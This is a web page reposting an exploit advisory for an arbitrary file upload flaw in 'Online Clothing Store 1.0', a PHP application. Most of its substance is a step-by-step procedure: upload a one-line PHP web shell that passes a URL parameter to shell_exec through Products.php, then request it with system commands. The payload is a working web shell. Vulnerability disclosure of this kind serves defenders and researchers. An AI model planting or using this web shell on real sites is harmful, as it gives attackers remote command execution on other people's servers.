Exploit/Advisories

Published on May 7th, 2020 📆 | 1586 Views ⚑

0

Online Clothing Store 1.0 Arbitrary File Upload ↭


iSpeech

Online Clothing Store 1.0 Arbitrary File Upload
Posted May 7, 2020
Authored by Saurav Shukla, Sushant Kamble

Online Clothing Store version 1.0 suffers from an arbitrary file upload vulnerability.

tags | exploit, arbitrary, file upload
MD5 | e1d15cf29f3926087b0d7678c38153df
# Exploit Title: Online Clothing Store 1.0 - Arbitrary File Upload
# Date: 2020-05-05
# Exploit Author: Sushant Kamble and Saurav Shukla
# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

#Vulnerable Page: Products.php





#Exploit
Open Products.php and select any product
Fill details
Create php shell code with below script
< ?php echo shell_exec($_GET['e'].' 2>&1'); ?>
Click on upload Image
Select php file
Click Submet
Access below URL:
http://localhost/online%20Clothing%20Store/Products/shell.php?e=dir
add system commands after e to execute it.

Source link

Tagged with:



Comments are closed.